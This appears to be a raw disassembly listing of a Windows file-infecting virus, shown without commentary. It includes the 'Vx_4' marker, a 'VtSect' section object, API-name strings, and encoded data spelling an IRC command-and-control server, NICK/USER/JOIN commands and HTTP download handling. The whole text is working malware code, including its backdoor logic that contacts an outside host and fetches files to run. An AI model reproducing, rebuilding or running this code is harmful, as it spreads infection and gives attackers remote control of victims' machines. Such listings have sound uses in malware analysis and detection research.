; sub_3142A1EE+B2�j ...
call dword ptr [ebp+103E52h]
jmp loc_3142A160
; END OF FUNCTION CHUNK FOR sub_3142A1EE
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_3142A5A0 proc near ; CODE XREF: .gda_:loc_3142A3E3�p
; sub_3142A5BF+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_3142A5A0 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3142A5BF proc near ; CODE XREF: sub_3142A1EE+9�p
xor ecx, ecx
call sub_3142A5A0
lea edx, [ebp+101549h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E56h]
add esp, 20h
retn
sub_3142A5BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3318h, 0E63h, 1, 2 dup(0)
dd 29B0h, 0
; =============== S U B R O U T I N E =======================================
sub_3142A5FC proc near ; CODE XREF: sub_3142A1EE+7C�p
; .gda_:3142A382�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E5Eh]
stosd
pop ecx
loc_3142A607: ; CODE XREF: sub_3142A5FC+E�j
lodsb
test al, al
jnz short loc_3142A607
loop sub_3142A5FC
retn
sub_3142A5FC endp
; =============== S U B R O U T I N E =======================================
sub_3142A60F proc near ; CODE XREF: sub_3142C18D+25�p
; FUNCTION CHUNK AT 3142A699 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 3142AA69 SIZE 00000027 BYTES
lea edx, [ebp+101975h]
push edx
call dword ptr [ebp+103EB6h]
mov [ebp+104278h], eax
call near ptr loc_3142A63C+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_3142A699
jbe short near ptr loc_3142A699+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_3142A6A0
inc ecx
loc_3142A63C: ; CODE XREF: sub_3142A60F+13�p
add [eax-1], dl
sub_3142A60F endp ; sp-analysis failed
xchg eax, ebp
pop esi
db 3Eh
adc [eax], al
mov [ebp+10427Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3142A60F
loc_3142A699: ; CODE XREF: sub_3142A60F+1F�j
; sub_3142A60F+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3142A703+2
loc_3142A6A0: ; CODE XREF: sub_3142A60F+2A�j
push edx
db 65h
insd
outsd
jz short loc_3142A70B
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3142A716+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3142A722+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_3142A741+1
push 4500746Fh
js short loc_3142A73F
jz short near ptr loc_3142A72B+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_3142A760
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_3142A743+6
loc_3142A703: ; CODE XREF: sub_3142A60F+8F�j
imul ebp, [ebp+41h], 69727474h
loc_3142A70B: ; CODE XREF: sub_3142A60F+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_3142A752
add [edi+65h], al
jz short near ptr loc_3142A75B+1
loc_3142A716: ; CODE XREF: sub_3142A60F+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_3142A768
loc_3142A722: ; CODE XREF: sub_3142A60F+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_3142A72B: ; CODE XREF: sub_3142A60F+C7�j
db 65h
jz short near ptr loc_3142A77A+1
outsd
db 64h
jnz short near ptr loc_3142A799+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3142A78D+6
loc_3142A73F: ; CODE XREF: sub_3142A60F+C5�j
db 65h
insd
loc_3142A741: ; CODE XREF: sub_3142A60F+BE�j
jo short near ptr loc_3142A787+2
loc_3142A743: ; CODE XREF: sub_3142A60F+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_3142A7A1+3
db 65h
insd
loc_3142A752: ; CODE XREF: sub_3142A60F+FF�j
jo short near ptr loc_3142A7A1+3
popa
jz short near ptr loc_3142A7BE+1
inc ecx
add [edi+65h], al
loc_3142A75B: ; CODE XREF: sub_3142A60F+105�j
jz short loc_3142A7B3
db 65h
jb short near ptr loc_3142A7D2+1
loc_3142A760: ; CODE XREF: sub_3142A60F+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_3142A768: ; CODE XREF: sub_3142A60F+110�j
db 65h
jb short near ptr loc_3142A7DC+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3142A7CB+1
outsd
insb
jnz short near ptr loc_3142A7E1+6
loc_3142A77A: ; CODE XREF: sub_3142A60F:loc_3142A72B�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3142A7EC+2
popa
jz short near ptr loc_3142A7EC+1
outsd
outsb
inc ecx
loc_3142A787: ; CODE XREF: sub_3142A60F:loc_3142A741�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3142A78D: ; CODE XREF: sub_3142A60F+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3142A7EF
loc_3142A799: ; CODE XREF: sub_3142A60F+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_3142A7A1: ; CODE XREF: sub_3142A60F+13F�j
; sub_3142A60F:loc_3142A752�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_3142A7B3: ; CODE XREF: sub_3142A60F:loc_3142A75B�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_3142A829+1
arpl [ebp+73h], sp
loc_3142A7BE: ; CODE XREF: sub_3142A60F+146�j
jnb short $+2
push eax
jb short loc_3142A832
arpl [ebp+73h], sp
jnb short near ptr loc_3142A7F4+7
xor al, [esi+69h]
loc_3142A7CB: ; CODE XREF: sub_3142A60F+164�j
jb short near ptr loc_3142A83A+6
jz short $+2
push eax
jb short near ptr loc_3142A83A+7
loc_3142A7D2: ; CODE XREF: sub_3142A60F+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_3142A809+1
xor cl, [esi+65h]
js short near ptr loc_3142A84C+4
loc_3142A7DC: ; CODE XREF: sub_3142A60F:loc_3142A768�j
add [ebx+65h], dl
jz short near ptr loc_3142A825+2
loc_3142A7E1: ; CODE XREF: sub_3142A60F+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3142A7EC: ; CODE XREF: sub_3142A60F+173�j
; sub_3142A60F+170�j
db 65h
jnb short loc_3142A830
loc_3142A7EF: ; CODE XREF: sub_3142A60F+188�j
add [ebx+65h], dl
jz short loc_3142A83A
loc_3142A7F4: ; CODE XREF: sub_3142A60F+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_3142A878
jz short loc_3142A86C
insd
push esp
loc_3142A809: ; CODE XREF: sub_3142A60F+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_3142A873
imul esp, [ebp+77h], 6946664Fh
insb
loc_3142A825: ; CODE XREF: sub_3142A60F+1D0�j
add gs:[esi+69h], dl
loc_3142A829: ; CODE XREF: sub_3142A60F+1AA�j
jb short near ptr loc_3142A89E+1
jnz short loc_3142A88E
insb
inc ecx
insb
loc_3142A830: ; CODE XREF: sub_3142A60F:loc_3142A7EC�j
insb
outsd
loc_3142A832: ; CODE XREF: sub_3142A60F+1B2�j
arpl [eax], ax
push edi
jb short loc_3142A8A0
jz short loc_3142A89E
inc esi
loc_3142A83A: ; CODE XREF: sub_3142A60F+1E3�j
; sub_3142A60F:loc_3142A7CB�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3142A8BA
push eax
jb short near ptr loc_3142A8AF+3
jbe short near ptr loc_3142A8AF+5
insb
loc_3142A84C: ; CODE XREF: sub_3142A60F+1CB�j
db 65h, 67h, 65h
jnb near ptr 0A8A5h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3142A89B+1
jb short near ptr loc_3142A8BF+1
popa
jz short loc_3142A8C3
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_3142A8D0
push eax
loc_3142A86C: ; CODE XREF: sub_3142A60F+1F6�j
jb short loc_3142A8DD
arpl [ebp+73h], sp
jnb short $+2
loc_3142A873: ; CODE XREF: sub_3142A60F+20C�j
dec esi
jz short near ptr loc_3142A8B6+3
jb short loc_3142A8DD
loc_3142A878: ; CODE XREF: sub_3142A60F+1F4�j
popa
jz short loc_3142A8E0
push eax
jb short loc_3142A8ED
arpl [ebp+73h], sp
jnb short near ptr loc_3142A8C3+5
js short $+2
dec esi
jz short loc_3142A8CB
jb short loc_3142A8EF
popa
jz short near ptr loc_3142A8EF+3
push ebx
loc_3142A88E: ; CODE XREF: sub_3142A60F+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3142A8FE+1
popa
loc_3142A89B: ; CODE XREF: sub_3142A60F+248�j
jz short loc_3142A902
push ebp
loc_3142A89E: ; CODE XREF: sub_3142A60F+228�j
; sub_3142A60F:loc_3142A829�j
jnb short near ptr loc_3142A904+1
loc_3142A8A0: ; CODE XREF: sub_3142A60F+226�j
jb short near ptr loc_3142A8EF+3
jb short loc_3142A913
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_3142A8F9
popa
jo short near ptr loc_3142A904+1
loc_3142A8AF: ; CODE XREF: sub_3142A60F+238�j
; sub_3142A60F+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_3142A8B6: ; CODE XREF: sub_3142A60F+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3142A8BA: ; CODE XREF: sub_3142A60F+235�j
outsb
add [esi+74h], cl
dec edi
loc_3142A8BF: ; CODE XREF: sub_3142A60F+24A�j
jo short loc_3142A926
outsb
inc esi
loc_3142A8C3: ; CODE XREF: sub_3142A60F+24D�j
; sub_3142A60F+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3142A8CB: ; CODE XREF: sub_3142A60F+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_3142A93F
loc_3142A8D0: ; CODE XREF: sub_3142A60F+25A�j
arpl [ebp+73h], sp
jnb short loc_3142A929
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3142A92B+1
loc_3142A8DD: ; CODE XREF: sub_3142A60F:loc_3142A86C�j
; sub_3142A60F+267�j
jo short near ptr loc_3142A943+1
outsb
loc_3142A8E0: ; CODE XREF: sub_3142A60F+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_3142A95B+1
loc_3142A8ED: ; CODE XREF: sub_3142A60F+26D�j
jz short near ptr loc_3142A953+1
loc_3142A8EF: ; CODE XREF: sub_3142A60F+279�j
; sub_3142A60F+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_3142A969
jnz short near ptr loc_3142A957+1
insb
dec ebp
loc_3142A8F9: ; CODE XREF: sub_3142A60F+29B�j
db 65h
insd
outsd
jb short near ptr loc_3142A974+3
loc_3142A8FE: ; CODE XREF: sub_3142A60F+289�j
add [esi+74h], cl
push ecx
loc_3142A902: ; CODE XREF: sub_3142A60F:loc_3142A89B�j
jnz short loc_3142A969
loc_3142A904: ; CODE XREF: sub_3142A60F:loc_3142A89E�j
; sub_3142A60F+29E�j
jb short near ptr loc_3142A97E+1
dec ecx
outsb
outsw
jb short near ptr loc_3142A978+1
popa
jz short loc_3142A978
outsd
outsb
push esp
outsd
loc_3142A913: ; CODE XREF: sub_3142A60F+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3142A96F+2
jb short loc_3142A985
jz short near ptr loc_3142A982+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_3142A926: ; CODE XREF: sub_3142A60F:loc_3142A8BF�j
db 65h
insd
outsd
loc_3142A929: ; CODE XREF: sub_3142A60F+2C4�j
jb short loc_3142A9A4
loc_3142A92B: ; CODE XREF: sub_3142A60F+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_3142A9A1+2
outsb
db 67h
push esp
outsd
inc ecx
loc_3142A93F: ; CODE XREF: sub_3142A60F+2BF�j
outsb
jnb short near ptr loc_3142A9AA+1
push ebx
loc_3142A943: ; CODE XREF: sub_3142A60F:loc_3142A8DD�j
jz short loc_3142A9B7
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_3142A9B0
jb short loc_3142A9C5
jnz short near ptr loc_3142A9C2+1
loc_3142A953: ; CODE XREF: sub_3142A60F:loc_3142A8ED�j
add [ebx+6Ch], ah
outsd
loc_3142A957: ; CODE XREF: sub_3142A60F+2E6�j
jnb short loc_3142A9BE
jnb short near ptr loc_3142A9C9+1
loc_3142A95B: ; CODE XREF: sub_3142A60F+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_3142A969: ; CODE XREF: sub_3142A60F+2E4�j
; sub_3142A60F:loc_3142A902�j
db 65h
jz short near ptr loc_3142A9D3+1
outsd
jnb short near ptr loc_3142A9E1+2
loc_3142A96F: ; CODE XREF: sub_3142A60F+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_3142A974: ; CODE XREF: sub_3142A60F+2ED�j
add gs:[edx+65h], dh
loc_3142A978: ; CODE XREF: sub_3142A60F+2FE�j
; sub_3142A60F+2FB�j
arpl [esi+0], si
jnb short near ptr loc_3142A9E1+1
outsb
loc_3142A97E: ; CODE XREF: sub_3142A60F:loc_3142A904�j
add fs:[ebx+6Fh], dh
loc_3142A982: ; CODE XREF: sub_3142A60F+30D�j
arpl [ebx+65h], bp
loc_3142A985: ; CODE XREF: sub_3142A60F+30B�j
jz short $+2
dec ecx
outsb
jz short loc_3142A9F0
jb short loc_3142A9FB
db 65h
jz short loc_3142A9D3
insb
outsd
jnb short near ptr loc_3142A9F8+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_3142AA04
jb short near ptr loc_3142AA0E+1
loc_3142A9A1: ; CODE XREF: sub_3142A60F+329�j
db 65h
jz short loc_3142A9EB
loc_3142A9A4: ; CODE XREF: sub_3142A60F:loc_3142A929�j
db 65h
jz short loc_3142A9EA
outsd
outsb
outsb
loc_3142A9AA: ; CODE XREF: sub_3142A60F+331�j
arpl gs:[ebp+64h], si
push ebx
loc_3142A9B0: ; CODE XREF: sub_3142A60F+33E�j
jz short near ptr loc_3142AA12+1
jz short loc_3142AA19
add [ecx+6Eh], cl
loc_3142A9B7: ; CODE XREF: sub_3142A60F:loc_3142A943�j
jz short near ptr loc_3142AA1C+2
jb short loc_3142AA29
db 65h
jz short near ptr loc_3142AA0B+2
loc_3142A9BE: ; CODE XREF: sub_3142A60F:loc_3142A957�j
jo short loc_3142AA25
outsb
inc ecx
loc_3142A9C2: ; CODE XREF: sub_3142A60F+342�j
add [ecx+6Eh], cl
loc_3142A9C5: ; CODE XREF: sub_3142A60F+340�j
jz short near ptr loc_3142AA2B+1
jb short loc_3142AA37
loc_3142A9C9: ; CODE XREF: sub_3142A60F+34A�j
db 65h
jz short near ptr loc_3142AA1A+1
jo short loc_3142AA33
outsb
push ebp
jb short near ptr loc_3142AA3C+2
inc ecx
loc_3142A9D3: ; CODE XREF: sub_3142A60F+37E�j
; sub_3142A60F:loc_3142A969�j
add [ecx+6Eh], cl
jz short near ptr loc_3142AA3C+1
jb short loc_3142AA48
db 65h
jz short near ptr loc_3142AA2E+1
db 65h
popa
db 64h
inc esi
loc_3142A9E1: ; CODE XREF: sub_3142A60F+36C�j
; sub_3142A60F+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3142A9EA: ; CODE XREF: sub_3142A60F:loc_3142A9A4�j
dec ecx
loc_3142A9EB: ; CODE XREF: sub_3142A60F:loc_3142A9A1�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_3142A9F0: ; CODE XREF: sub_3142A60F+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_3142A9F8: ; CODE XREF: sub_3142A60F+383�j
jnb short near ptr loc_3142AA5D+2
dec ebx
loc_3142A9FB: ; CODE XREF: sub_3142A60F+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_3142AA69
loc_3142AA04: ; CODE XREF: sub_3142A60F+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_3142AA4C+2
js short loc_3142AA4C
loc_3142AA0B: ; CODE XREF: sub_3142A60F+3AC�j
add [edx+65h], dl
loc_3142AA0E: ; CODE XREF: sub_3142A60F+390�j
db 67h
push ecx
jnz short loc_3142AA77
loc_3142AA12: ; CODE XREF: sub_3142A60F:loc_3142A9B0�j
jb short near ptr loc_3142AA8C+1
push esi
popa
insb
jnz short near ptr loc_3142AA7D+1
loc_3142AA19: ; CODE XREF: sub_3142A60F+3A3�j
inc ebp
loc_3142AA1A: ; CODE XREF: sub_3142A60F:loc_3142A9C9�j
js short loc_3142AA5D
loc_3142AA1C: ; CODE XREF: sub_3142A60F:loc_3142A9B7�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_3142AA7A
popa
loc_3142AA25: ; CODE XREF: sub_3142A60F:loc_3142A9BE�j
insb
jnz short near ptr loc_3142AA8C+1
inc ebp
loc_3142AA29: ; CODE XREF: sub_3142A60F+3AA�j
js short loc_3142AA6C
loc_3142AA2B: ; CODE XREF: sub_3142A60F:loc_3142A9C5�j
add [esi+33h], dl
loc_3142AA2E: ; CODE XREF: sub_3142A60F+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_3142AA33: ; CODE XREF: sub_3142A60F+3BD�j
mov edx, esp
push 1
loc_3142AA37: ; CODE XREF: sub_3142A60F+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_3142AA3C: ; CODE XREF: sub_3142A60F+3C7�j
; sub_3142A60F+3C1�j
call dword ptr [ebp+10427Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_3142AA48: ; CODE XREF: sub_3142A60F+3C9�j
push esi
push dword ptr [eax+18h]
loc_3142AA4C: ; CODE XREF: sub_3142A60F+3FA�j
; sub_3142A60F+3F7�j
call dword ptr [ebp+103EEAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_3142A60F
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_3142AA5D: ; CODE XREF: sub_3142A60F:loc_3142AA1A�j
; sub_3142A60F:loc_3142A9F8�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3142A60F
loc_3142AA69: ; CODE XREF: sub_3142A60F+3F3�j
add [edx+5], ch
loc_3142AA6C: ; CODE XREF: sub_3142A60F:loc_3142AA29�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_3142AA77: ; CODE XREF: sub_3142A60F+401�j
push esp
push 40h
loc_3142AA7A: ; CODE XREF: sub_3142A60F+412�j
push ecx
push edx
push ebx
loc_3142AA7D: ; CODE XREF: sub_3142A60F+408�j
call dword ptr [ebp+103F12h]
add esp, 0Ch
call dword ptr [ebp+103F1Ah]
loc_3142AA8C: ; CODE XREF: sub_3142A60F:loc_3142AA12�j
; sub_3142A60F+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_3142A60F
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 20h
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 18h
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 18h
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 2
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 52h ; R
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 80h ; €
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0EEh ; î
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 53h ; S
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0F2h ; ò
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 5Ah ; Z
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0F6h ; ö
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 67h ; g
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 74h ; t
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B14h
xor ecx, ecx
lea eax, [ebp+101E9Fh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E7Eh]
xchg eax, [esp]
call dword ptr [ebp+103E52h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh
dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh
dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h
dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h
dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h
dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh
dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 68747077h
dd 61666862h, 4553550Ah, 4A742052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h
dd 103EAA95h, 1FE8C100h, 1E6A3C74h, 3E62B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h
dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h
